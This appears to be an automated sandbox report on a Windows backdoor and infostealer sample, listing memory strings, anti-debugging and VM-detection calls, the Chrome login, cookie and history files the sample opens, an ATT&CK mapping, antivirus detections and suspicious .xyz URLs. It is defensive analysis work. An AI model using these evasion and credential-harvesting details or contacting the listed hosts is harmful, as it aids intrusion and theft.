Source: 6272167835D47591.exe, 00000002.00000003.285054879.0000000004166000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}O
Source: 6272167835D47591.exe, 00000002.00000003.263182441.0000000000BB4000.00000004.00000040.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}B=3s
Source: 6272167835D47591.exe, 00000002.00000003.284588878.000000000415F000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}w
Source: 6272167835D47591.exe, 00000004.00000002.274005662.000000000019B000.00000004.00000010.sdmp	Binary or memory string: VMware
Source: 6272167835D47591.exe, 00000002.00000003.286909259.000000000418A000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.266340600.0000000002E50000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 6272167835D47591.exe, 00000002.00000002.349129349.0000000000BB9000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}B=3s
Source: 6272167835D47591.exe, 00000002.00000003.284319161.0000000004159000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000002.00000003.284588878.000000000415F000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000004.00000003.266653982.0000000002B34000.00000004.00000040.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}q

Source: C:\Users\user\AppData\Roaming\1611970727133.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,

2_2_10019FF0

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process queried: DebugFlags	Jump to behavior

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_004EFAF0 rdtsc

0_2_004EFAF0

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_1001A010 IsDebuggerPresent,

2_2_1001A010

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00414280 PathCombineW,LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_00414280

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10019DE0 mov eax, dword ptr fs:[00000030h]	2_2_10019DE0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10019E10 mov eax, dword ptr fs:[00000030h]	2_2_10019E10
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10019E10 mov eax, dword ptr fs:[00000030h]	2_2_10019E10
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]	2_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]	2_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h]	2_2_10019ED0

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_004EE116 GetProcessHeap,HeapAlloc,InterlockedPopEntrySList,InterlockedPopEntrySList,VirtualAlloc,InterlockedPopEntrySList,VirtualFree,InterlockedPushEntrySList,

0_2_004EE116

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0040D290 EnterCriticalSection,std::_Xinvalid_argument,SetUnhandledExceptionFilter,__set_purecall_handler,__set_purecall_handler,	0_2_0040D290
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0040D340 GetCurrentThreadId,SetUnhandledExceptionFilter,__set_purecall_handler,__set_purecall_handler,LeaveCriticalSection,	0_2_0040D340
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0040D300 SetUnhandledExceptionFilter,__set_purecall_handler,__set_purecall_handler,LeaveCriticalSection,	0_2_0040D300
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,	2_2_10015354
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,	2_2_10015376
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	2_2_10018413
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_1000E44D
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1461F SetUnhandledExceptionFilter,	25_2_00B1461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B11C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_00B11C57
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_00B1373A
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_00B1631F

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,

2_2_1001A0F0

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00411380 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00411380

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_1001779F cpuid

2_2_1001779F

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: _memset,RegCloseKey,_memset,GetLocaleInfoW,	0_2_00443060
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: GetLocaleInfoA,	2_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: GetLocaleInfoA,	25_2_00B17189

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

2_2_10019780

Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_004415F0 GetSystemTime,RegSetValueExW,

0_2_004415F0

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_004C8360 LookupAccountNameW,GetLastError,LookupAccountNameW,CopySid,

0_2_004C8360

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00463240 GetVersionExW,

0_2_00463240

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Replication Through Removable Media1	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	LSASS Memory	Peripheral Device Discovery11	Remote Desktop Protocol	Man in the Browser1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter2	Valid Accounts1	Valid Accounts1	Obfuscated Files or Information2	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Local System1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Browser Extensions1	Access Token Manipulation1	Install Root Certificate2	NTDS	File and Directory Discovery3	Distributed Component Object Model	Clipboard Data1	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Bootkit1	Process Injection11	Software Packing1	LSA Secrets	System Information Discovery157	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Query Registry2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading1	DCSync	Security Software Discovery561	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Valid Accounts1	Proc Filesystem	Virtualization/Sandbox Evasion13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Access Token Manipulation1	/etc/passwd and /etc/shadow	Process Discovery3	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Virtualization/Sandbox Evasion13	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Process Injection11	Input Capture	Remote System Discovery11	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Bootkit1	Keylogging	System Network Configuration Discovery11	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
N1yprTBBXs.exe	38%	Virustotal		Browse
N1yprTBBXs.exe	22%	Metadefender		Browse
N1yprTBBXs.exe	59%	ReversingLabs	Win32.Backdoor.Poison
N1yprTBBXs.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	22%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	59%	ReversingLabs	Win32.Backdoor.Poison
C:\Users\user\AppData\Local\Temp\MSI1983.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\MSI1983.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\atl71.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\download_engine.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\download_engine.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\zlib1.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\zlib1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\xldl.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\xldl.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\1611970727133.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Roaming\1611970727133.exe	14%	ReversingLabs	Win32.Infostealer.EdgeCookiesView

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://84cfba021a5a6662.xyz/info_old/g	0%	Avira URL Cloud	safe
http://84cfba021a5a6662.xyz/info_old/e	0%	Avira URL Cloud	safe
http://84cfba021a5a6662.xyz/info_old/w	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	Avira URL Cloud	safe
